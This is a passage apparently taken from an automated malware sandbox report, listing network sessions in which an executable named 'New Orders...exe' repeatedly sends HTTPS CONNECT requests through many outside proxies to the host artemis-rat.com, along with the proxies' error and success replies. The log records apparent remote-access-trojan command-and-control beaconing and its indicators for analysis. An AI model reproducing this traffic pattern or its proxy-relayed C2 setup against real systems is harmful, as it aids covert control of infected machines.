                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476720095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.664100885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773916006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.964751005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.163999081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.252348900 CET536INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:17:05 GMT
                                                                                        Server: Apache/2.4.52 (Debian)
                                                                                        Content-Length: 614
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                        Mar 11, 2024 16:17:05.252367020 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                        Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Debian) Server at artemis-rat.com Port 44


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        419192.168.2.951161203.74.125.1888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.570560932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        420192.168.2.951158154.12.178.107299857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.570661068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        421192.168.2.951325104.27.66.31807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.570758104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.725874901 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        422192.168.2.951328172.67.182.77807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.570832968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.725945950 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        423192.168.2.95121772.10.164.178307177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.570900917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        424192.168.2.95122072.10.160.90298137672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.571309090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.948290110 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        425192.168.2.9512845.78.65.91807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.571486950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.791832924 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        426192.168.2.951124103.53.78.2680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.572716951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.294909954 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        427192.168.2.950573184.181.217.19441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.573735952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        428192.168.2.95118037.187.77.58189367672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.575170040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.241981983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.242136955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.166249037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945749044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        429192.168.2.95137547.236.85.1134437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.666990995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        430192.168.2.95137643.153.174.1974437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.669780016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        431192.168.2.95063592.204.134.38256757672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.673415899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.726150036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.742413998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        432192.168.2.951323209.121.164.5031147
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.673477888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.869338036 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                        Server: squid/5.6
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3773
                                                                                        X-Squid-Error: ERR_CONNECT_FAIL 101
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {m


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        433192.168.2.951255154.16.116.16625127672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.673521996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.241942883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.132853985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        434192.168.2.9513013.21.101.15831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.673571110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.890435934 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        435192.168.2.951332162.241.50.179401797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674349070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.179316998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        436192.168.2.95066192.204.134.38297187672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674398899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.726094961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.742410898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
